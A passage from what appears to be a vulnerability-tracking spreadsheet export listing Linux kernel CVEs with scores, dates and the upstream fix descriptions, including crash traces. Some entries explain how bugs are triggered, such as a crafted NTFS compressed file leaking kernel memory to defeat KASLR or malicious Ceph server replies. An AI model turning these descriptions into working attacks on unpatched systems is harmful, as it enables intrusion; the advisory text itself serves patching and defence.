[   12.001627]  nvme_init_ctrl+0x5a3/0x9f0
[   12.001891]  nvme_tcp_create_ctrl+0xd75/0x19b0
[   12.002170]  nvmf_dev_write+0x4c68/0x4fd0
[   12.002426]  vfs_write+0x587/0x1a10
[   12.002636]  __x64_sys_write+0x207/0x4f0
[   12.002874]  x64_sys_call+0x2ff0/0x3ea0
[   12.003123]  do_syscall_64+0x147/0x3b0
[   12.003400]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   12.003680]
[   12.003777] Bytes 16-2843 of 2844 are uninitialized
[   12.004068] Memory access of size 2844 starts at ffff888109f82000
[   12.004412]
[   12.004530] CPU: 0 UID: 0 PID: 101 Comm: kworker/0:1H Not tainted 7.2.0-rc5-NVMECTL-gf5098b6bae76 #1 PREEMPT(lazy)
[   12.005127] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   12.005762] Workqueue: kblockd blk_mq_run_work_fn
[   12.006073] =====================================================
Allocate the page with __GFP_ZERO.  The single allocation site covers
every use of it: bytes no discard has written stay zero, and bytes one
did write hold that controller's own range list, which it has already
been sent.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89483</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89511</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
qede: Fix NULL pointer dereference in TPA fragment processing
Under memory pressure, the qede driver encounters NULL pointer
dereferences when processing TPA continuation fragments.
Commit 8a8633978b84 ("qede: Add build_skb() support.") accidentally
dropped the assignment of tpa_info-&gt;buffer.data in qede_tpa_start().
When memory pressure causes an SKB allocation failure in qede_tpa_start(),
the driver sets tpa_start_fail = true and attempts to recycle the physical
page later in qede_tpa_end() via qede_reuse_page(). However, because
buffer.data was left uninitialized (NULL), qede_reuse_page() pushes a
"ghost" BD (valid DMA mapping but NULL data pointer) back into the
active Rx ring.
The next time the hardware uses this ring slot, it passes a NULL page
to qede_fill_frag_skb(), causing a kernel panic.
Example crash from production system:
 BUG: unable to handle kernel NULL pointer dereference at 0x8
 RIP: qede_fill_frag_skb+0x96/0x430 [qede]
 Call Trace:
   qede_rx_int+0xb06/0x1de0
   qede_poll+0x2f4/0x6c0
   __napi_poll+0x2d/0x130
Fix the root cause by restoring the tpa_info-&gt;buffer.data assignment
in qede_tpa_start(), ensuring valid pages are correctly tracked and
recycled. Additionally, update the stale comment for
struct qede_agg_info::buffer to reflect its current usage.</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89511</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89528</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reject Read lists that exceed the page budget
Individual Read segment lengths are validated at decode time, but
nothing prevents a requester from sending multiple segments whose
cumulative length exceeds the rq_pages array budget. When one
segment fills the page array exactly, the runtime guard in
svc_rdma_build_read_segment() is bypassed because len reaches zero.
A subsequent segment then accesses the NULL sentinel slot at
rq_pages[rq_maxpages], resulting in a NULL pointer dereference during
DMA mapping.
Accumulate pages across all Read segments and reject the message at
decode time when the total would overflow the page budget.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89528</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89544</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: fix gssx_dec_option_array error path bugs
Four coupled defects in the gssx XDR option-array decoder make the
error paths unsafe: a NULL deref in the caller, a refcount leak on
the decoded group_info, and a latent use-after-free that the leak
fix would otherwise expose.
gssx_dec_option_array() sets oa-&gt;count = 1 before allocating
oa-&gt;data.  If that allocation fails, -ENOMEM is returned with
oa-&gt;count == 1 and oa-&gt;data == NULL.  All other error paths jump
to free_oa: which frees oa-&gt;data and NULLs it but also leaves
oa-&gt;count == 1.  The caller trusts the count:
    gssp_accept_sec_context_upcall()
      gssx_dec_accept_sec_context()
        gssx_dec_option_array()        /* fails, count=1 data=NULL */
      data = res.options.data[0].value /* NULL deref */
Independently, free_creds: releases the partially decoded svc_cred
with a bare kfree(creds).  gssx_dec_linux_creds() installs a
groups_alloc() result into creds-&gt;cr_group_info; that object is
kvmalloc-backed and refcounted, and only put_group_info() reaches
kvfree().  A plain kfree(creds) drops the wrapper and leaks the
group_info allocation.
The natural fix for the leak is to call free_svc_cred(creds) before
kfree(creds), but free_svc_cred() invokes put_group_info() on
creds-&gt;cr_group_info unconditionally when non-NULL.  The existing
out_free_groups: path in gssx_dec_linux_creds() already called
groups_free() on that pointer without clearing it, so once
free_svc_cred() is wired in, the subsequent put_group_info() would
touch freed memory.
Fix all four together:
  - Move the oa-&gt;count = 1 assignment below the oa-&gt;data allocation
    so it is never set when oa-&gt;data is NULL.
  - Reset oa-&gt;count to 0 at free_oa: so count and data stay
    coherent and the caller sees an empty option array.
  - Call free_svc_cred(creds) before kfree(creds) at free_creds:
    so the refcounted cr_group_info is released.  free_svc_cred()
    either NULL-guards each field explicitly (cr_group_info has
    an if() check) or delegates to a helper that is NULL-safe
    itself (kfree for the string fields, gss_mech_put() which
    guards with if(gm) at gss_mech_switch.c:342), so it is safe
    to call on a partially decoded svc_cred where only
    cr_uid/cr_gid/cr_group_info have been written and everything
    else is zero from kzalloc.
  - In gssx_dec_linux_creds()'s out_free_groups: path, release
    cr_group_info with put_group_info() rather than groups_free()
    so the teardown matches free_svc_cred()'s refcount-aware path,
    and clear the pointer so a later free_svc_cred() on the same
    creds does not release it a second time.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89544</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89549</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: route to a populated pool in svc_pool_for_cpu()
svc_set_num_threads() spreads the requested threads evenly across the
service's pools (base = nrservs / sv_nrpools).  When a service runs
fewer threads than it has pools -- e.g. an nfsd configured with fewer
threads than the host has NUMA nodes while running in "pernode" or
"percpu" mode -- the trailing pools are left with no threads at all.
svc_xprt_enqueue() selects a pool from the CPU servicing the transport,
queues the transport on that pool's sp_xprts, and only wakes a thread
from the same pool.  Each thread services exclusively its own pool, so a
transport that lands on a threadless pool is enqueued on sp_xprts and
never picked up: the connection hangs indefinitely.
Have svc_pool_for_cpu() skip pools that currently have no threads,
falling back to the next populated pool.  This trades NUMA locality for
a guarantee that the work is actually serviced.  sp_nrthreads is only
updated under the service mutex; the lockless read here is a best-effort
routing hint, so annotate it with data_race().</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89549</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89561</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: rpl: fix NULL dereference of idev in ipv6_rpl_srh_rcv()
ipv6_rpl_srh_rcv() dereferences idev from __in6_dev_get() without a NULL
check when reading idev-&gt;cnf.rpl_seg_enabled.
When the device's MTU drops below IPV6_MIN_MTU, addrconf_ifdown() clears
dev-&gt;ip6_ptr through RCU_INIT_POINTER(). A packet that passed the idev
check in ip6_rcv_core() can then reach ipv6_rpl_srh_rcv() with
dev-&gt;ip6_ptr already NULL.
Reproduced by flooding the receiving interface with ping6 traffic while
flapping its MTU between 1500 and 1200:
 BUG: KASAN: null-ptr-deref in ipv6_rpl_srh_rcv+0xb3/0x1070
 Read of size 4 at addr 00000000000006b4 by task ping6/394
 CPU: 2 UID: 0 PID: 394 Comm: ping6 Not tainted 7.2.0-rc7-micro-vm-dev-00095-g24ef02f934ee #240 PREEMPT(full)
 Call Trace:
  &lt;IRQ&gt;
  kasan_report+0xc6/0x100
  ipv6_rpl_srh_rcv+0xb3/0x1070
  ip6_protocol_deliver_rcu+0x759/0x9a0
  ip6_input_finish+0xa8/0x1b0
  ip6_input+0xe1/0x490
  ipv6_rcv+0x33d/0x460
  __netif_receive_skb_one_core+0xd6/0x130
  process_backlog+0x2cc/0xa00
  __napi_poll.constprop.0+0x56/0x270
  net_rx_action+0x327/0x730
  handle_softirqs+0x11e/0x630
  do_softirq+0xb3/0xf0
  &lt;/IRQ&gt;
Both ipv6_rpl_srh_rcv() and ipv6_srh_rcv() are called only from
ipv6_rthdr_rcv(), which already has an idev lookup.
Fix the NULL dereference on the RPL path by checking idev in
ipv6_rthdr_rcv(), before it calls either function. The callees take idev as
an argument and no longer call __in6_dev_get(), so the packet is now
dropped in one place, with SKB_DROP_REASON_IPV6DISABLED on both paths.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89561</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89616</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix info-leak on partial LZNT decompress in ni_read_frame()
ni_read_frame() decompresses an LZNT $DATA frame into the vmapped target
pages and then trusts decompress_lznt()'s return value:
  unc_size = decompress_lznt(frame_ondisk, ondisk_size, frame_mem,
                             frame_size);
  if ((ssize_t)unc_size &lt; 0)        err = unc_size;
  else if (!unc_size || unc_size &gt; frame_size)  err = -EINVAL;
decompress_lznt() stops as soon as the compressed stream is exhausted
(e.g. a zero chunk header) and returns the number of bytes it actually
wrote, which may be far less than frame_size. The bytes between unc_size
and frame_size are never written. The only memset() that follows zeroes
the region beyond i_valid; when the frame lies entirely within the file's
valid size that memset() does not run, so the gap retains whatever was in
the just-vmapped pages. All pages are then marked uptodate and returned
to userspace, disclosing uninitialized (recently-freed) kernel page
memory. A crafted compressed file whose stream decompresses to only a few
bytes leaks the remainder of every frame on a plain read(2), which is
enough to recover kernel pointers and defeat KASLR.
Zero the [unc_size, frame_size) tail immediately after a successful LZNT
decompress so the remainder reads back as zero.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89616</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89647</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: do not repeat ceph_trim_dentries() if no progress possible
ceph_cap_reclaim_work() re-queues itself for as long as
ceph_trim_dentries() returns -EAGAIN, which happens whenever a lease
walk exhausts its `nr_to_scan` budget.  This creates a busy loop that
consumes CPU without making any progress when there is nothing to
reclaim: with no cap pressure (`count==0`) and every scanned lease
still valid, each pass runs the full scan budget down to zero and
returns `-EAGAIN`, only to be queued again immediately.
The dir-lease walk made this worse.  When `expire_dir_lease` is
`false` (i.e. we have no intention of reclaiming dir leases),
__dir_lease_check() returned `TOUCH` for every valid lease.  `TOUCH`
moves the dentry to the tail of the list and resets `di-&gt;time` via
__dentry_dir_lease_touch(), so a walk over N valid leases pointlessly
rewrote the list, refreshed the timestamps (preventing them from ever
aging out) and always drained `nr_to_scan`, guaranteeing the `-EAGAIN`
requeue.
Fix this in three steps:
 - Return `KEEP` instead of `TOUCH` when `expire_dir_lease` is
   `false`.  If we are not going to reclaim the lease, leave it in
   place instead of churning the list and resetting its timestamp; the
   walk then terminates naturally (or via `STOP` at the first fresh
   lease).
 - Only return `-EAGAIN` from the first (dentry-lease) walk when something
   was actually freed.  A full batch that frees nothing means retrying
   the same list immediately is futile; fall through to the dir-lease
   walk instead.
 - After both walks, bail out with success (0) when nothing was freed
   and there is no cap pressure (`count==0`).  There is no reason to
   keep retrying when we are not over the cap limit and made no
   progress.
Under real cap pressure (`count&gt;0`) the reclaim path is unchanged and
still retries via `-EAGAIN`.
Without this patch, I saw 500 ceph_trim_dentries() calls per second on
our web servers.  This is very visible in `/proc/lock_stat` (5 minute
capture):
              class name    con-bounces    contentions   waittime-min   waittime-max waittime-total   waittime-avg    acq-bounces   acquisitions   holdtime-min   holdtime-max holdtime-total   holdtime-avg
 &amp;mdsc-&gt;dentry_list_lock:        126180         128218           0.04        8063.44    15986965.20         124.69        1573354        5296812           0.04        8291.28    74164526.48          14.00
 -----------------------
 &amp;mdsc-&gt;dentry_list_lock         111736          [&lt;000000007b11e319&gt;] __ceph_dentry_dir_lease_touch+0x7c/0xa8
 &amp;mdsc-&gt;dentry_list_lock           2631          [&lt;0000000050597999&gt;] __dentry_leases_walk+0x64/0x2c8
 &amp;mdsc-&gt;dentry_list_lock           3878          [&lt;00000000c0022f62&gt;] __ceph_dentry_lease_touch+0x5c/0xa8
 &amp;mdsc-&gt;dentry_list_lock           9973          [&lt;000000002f27cb6f&gt;] __dentry_lease_unlist+0x50/0xa0
 -----------------------
 &amp;mdsc-&gt;dentry_list_lock         123621          [&lt;0000000050597999&gt;] __dentry_leases_walk+0x64/0x2c8
 &amp;mdsc-&gt;dentry_list_lock           1822          [&lt;000000007b11e319&gt;] __ceph_dentry_dir_lease_touch+0x7c/0xa8
 &amp;mdsc-&gt;dentry_list_lock           2720          [&lt;000000002f27cb6f&gt;] __dentry_lease_unlist+0x50/0xa0
 &amp;mdsc-&gt;dentry_list_lock             55          [&lt;00000000c0022f62&gt;] __ceph_dentry_lease_touch+0x5c/0xa8
With this patch:
              class name    con-bounces    contentions   waittime-min   waittime-max waittime-total   waittime-avg    acq-bounces   acquisitions   holdtime-min   holdtime-max holdtime-total   holdtime-avg
 &amp;mdsc-&gt;dentry_list_lock:          1203           1215           0.16         408.88       33082.88          27.23        4320501        7357389           0.04         500.64     1961578.00           0.27
 -----------------------
 &amp;mdsc-&gt;dentry_list_lock           1029          [&lt;000000003c9aea8a&gt;] __ceph_dentry_dir_lease_touch+0x7c/0xa8
 &amp;mdsc-&gt;dentry_list_lock            1
---truncated---</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89647</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89648</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: cap delegated inode count in ceph_parse_deleg_inos()
ceph_parse_deleg_inos() decodes interval sets of delegated inode numbers
from an MDS create-with-delegation reply. For each set it reads a 64-bit
start and a 64-bit len with ceph_decode_64_safe(), which only validates
that the eight bytes are present in the message, not the value, and then
loops over len while inserting entries into s_delegated_inos.
len is fully attacker controlled. A malicious or compromised MDS can send
one huge interval, many intervals in one reply, duplicate intervals, or
repeated replies that accumulate delegated inodes on the same session.
The original code bounded none of these and could spin the insert loop or
grow the xarray without limit.
Bound both dimensions with a single enforcement point. Track the number
of delegated inodes held by each MDS session in an atomic counter and
grow it only in ceph_insert_deleg_ino(), which uses atomic_add_unless()
to refuse to push the count past CEPH_MAX_DELEG_INOS. Because that helper
is the only place the counter grows, the per-session population can never
exceed the cap, so no separate per-session pre-check is needed. The
counter is decremented when async create consumes a delegated inode or
when an insert fails, incremented when a delegated inode is restored,
initialized with the session xarray, and reset when reconnect destroys
the xarray.
A per-session cap alone still lets one reply spin the insert loop on
duplicate ranges without growing the counter, so also cap the aggregate
interval length accepted from a single reply. Together these bound both
the loop trip count per reply and the xarray population across replies.
The cap is a fixed, client-chosen constant rather than a value derived
from the MDS. mds_client_prealloc_inos is a userspace MDS configuration
option; it is never sent to the kernel client on the wire, and a
server-supplied bound could not be trusted for a defensive limit in any
case. The constant is set well above that option's documented default of
1000 (a generous multiple), so legitimate refill behavior is unaffected
while the CPU and xarray memory a malformed delegation stream can consume
stays bounded.
Impact: a malicious or compromised Ceph MDS can no longer make a client
spin through an unbounded delegated-inode interval or grow one session's
delegated-inode xarray without limit.</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89648</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89657</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libceph: validate OSD extent maps before cursor advance
net/ceph/osd_client.c:osd_sparse_read() validates that the sparse-read
data length matches the summed extent lengths, but it does not validate
that each OSD-supplied extent is monotonic and lies inside the original
request range. A malformed authenticated OSD reply can advertise a
far-forward nonzero extent offset with a matching data length and make
the client advance the message-data cursor beyond the request buffer.
This reaches the BUG_ON(!*length) assertion in ceph_msg_data_next() from
the client receive path.
Impact: A malicious or compromised authenticated Ceph OSD peer can crash
a kernel Ceph client via a malformed sparse-read reply.
Reject sparse extent maps that overflow, move backwards, overlap, or
extend outside the original sparse-read request before advancing the
cursor.
[ idryomov: perform sparse_extent_map_valid() check a bit earlier,
  in CEPH_SPARSE_READ_DATA_LEN instead of CEPH_SPARSE_READ_DATA_PRE
  state ]</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89657</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89664</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: release OPEN-decoded posix ACLs via op_release
nfsd4_decode_createhow4() calls nfsd4_decode_fattr4(), which allocates
refcounted struct posix_acl objects via posix_acl_alloc() and stores
them in open-&gt;op_pacl and open-&gt;op_dpacl. These pointers must be
